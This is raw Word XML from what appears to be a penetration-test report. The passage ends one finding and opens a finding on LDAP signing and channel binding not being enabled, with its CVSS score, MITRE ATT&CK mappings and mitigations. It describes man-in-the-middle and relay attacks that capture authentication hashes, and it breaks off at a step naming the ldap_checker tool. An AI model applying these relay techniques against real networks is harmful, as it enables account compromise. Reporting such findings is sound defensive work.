          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=Strict</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="507A3C57">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cookies from exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3488AB77" w14:textId="733E5FFE">
      <w:pPr>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507A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="22D8EA5B" w14:textId="0C5F3EEF">
      <w:pPr>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07A3C57">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07A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="2E83CA98" w14:textId="3D39B94E">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R4ffda745b7244841">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="507A3C57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Mozilla - Secure Cookie Configurations</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="507A3C57" w:rsidP="0D325B6E" w:rsidRDefault="507A3C57" w14:paraId="5108E70E" w14:textId="5436B30E">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R55c8ef887653498c">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="507A3C57">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Portswigger - Cross Site Scripting Prevention</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7B55ED40" w14:textId="6763418C">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="31CD168B" w14:textId="1B4B892B">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="01F3A135" w14:textId="4860E163">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="6C75F900" w14:textId="2CD7B8A2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="33C075E7" w14:textId="71BCB754">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="43A0DAAC" w:rsidP="0D325B6E" w:rsidRDefault="43A0DAAC" w14:paraId="0E0DC872" w14:textId="1042898D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="43A0DAAC">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="43A0DAAC">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">M1: </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="43A0DAAC">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LDAP Signing and Channel Binding Not Enabled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1144E57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16A260" w14:textId="58EB32C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7F6E769" w14:textId="5D9C11D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80CBA37" w14:textId="2859A01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A58F13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4EBAC3B" w14:textId="6A6C45F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AC859C4" w14:textId="37C515E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7144E4F" w14:textId="4A4C4FAE">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5.</w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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4B7D943" w14:textId="0CE68D2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2955621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630FD6" w14:textId="4335C98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1101C7E5" w:rsidP="0D325B6E" w:rsidRDefault="1101C7E5" w14:paraId="2F01C2CD" w14:textId="194C4C23">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1101C7E5">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7B327836"/>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9D527C1"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1FEB9780">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405B61" w14:textId="4602F9F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7D509E8" w:rsidP="0D325B6E" w:rsidRDefault="77D509E8" w14:paraId="0DCA1D13" w14:textId="7F7FE1B8">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A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" r:id="R0206f8a8a17f4030">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="77D509E8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="77D509E8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6ABB2C14">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F71E94" w14:textId="4A9984F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E9BDB04" w14:textId="43F6FCFE">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058386A" w:rsidP="0D325B6E" w:rsidRDefault="4058386A" w14:paraId="6FE6BCCE" w14:textId="7006CE32">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R871e0bbdf444434a">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4058386A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1557</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2752FB5D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve">: Adversay in the Middle </w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="4058386A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="4058386A" w:rsidP="0D325B6E" w:rsidRDefault="4058386A" w14:paraId="4D26F87E" w14:textId="54150F66">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d5eb4b7016a946f3">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4058386A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1040</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="39BF0DBE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="4058386A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Network Sniffing</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="4058386A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="19804FBD">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0A737F09">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84D7978"/>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BD15F2" w14:textId="58143664">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CDF97D4" w:rsidP="0D325B6E" w:rsidRDefault="2CDF97D4" w14:paraId="65B677E6" w14:textId="41034C15">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8b5c92de8998412a">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2CDF97D4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1041: Encrypt Sensitive Information</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="2CDF97D4" w:rsidP="0D325B6E" w:rsidRDefault="2CDF97D4" w14:paraId="33FE3D82" w14:textId="619C2688">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rf0b0bfb632464d92">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2CDF97D4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M0931</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="412C47B1">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2CDF97D4">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Network Intrusion Prevention</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2C1C9287">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9384D5D" w14:textId="3B39C72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93A23B2" w14:textId="480269A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0E2B6759" w14:textId="52024AF7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="43A0DAAC" w:rsidP="0D325B6E" w:rsidRDefault="43A0DAAC" w14:paraId="6BD3DE95" w14:textId="0AD6418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BDC8006" w:rsidP="0D325B6E" w:rsidRDefault="1BDC8006" w14:paraId="4F84F784" w14:textId="69C13603">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DC8006">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LDAP Signing and Channel Binding is not enabled on the system. </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7C44D52B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As a result,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1BDC800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F1B229E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LDAP sessions lack</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1BDC800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665EDEE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1BDC8006">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66163D31">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>verification,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1BDC8006">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fo</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3D3DE2D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r attackers to perform a man-in-the-middle attack to intercept and manipulate data. Additionally, a relay attack can be performed to intercept network authenticati</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1E9E1244">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on hashes, which can lead to account compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0379D5F7" w14:textId="141D285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3A0DAAC" w:rsidP="0D325B6E" w:rsidRDefault="43A0DAAC" w14:paraId="771DCA98" w14:textId="1493AA1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345BD780" w:rsidP="0D325B6E" w:rsidRDefault="345BD780" w14:paraId="2044AB79" w14:textId="07D8B8F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45BD780">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the compromise of network accounts through a relay attack. </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="70E75F4D">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345BD780">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttacker</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="593745E7">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345BD78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A43A5A5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="345BD780">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> perform a man-in-the-middle attack which </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="095B7D29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">will </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="345BD780">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>result in compromise of confidentiality and integrity of communication over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1F7679E9" w14:textId="08EF320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3A0DAAC" w:rsidP="0D325B6E" w:rsidRDefault="43A0DAAC" w14:paraId="697F028B" w14:textId="4F08AEF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1D10DB4" w:rsidP="0D325B6E" w:rsidRDefault="51D10DB4" w14:paraId="3A513A10" w14:textId="1AC0A6CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>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D10DB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51D10DB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ldap_checker</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51D10DB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
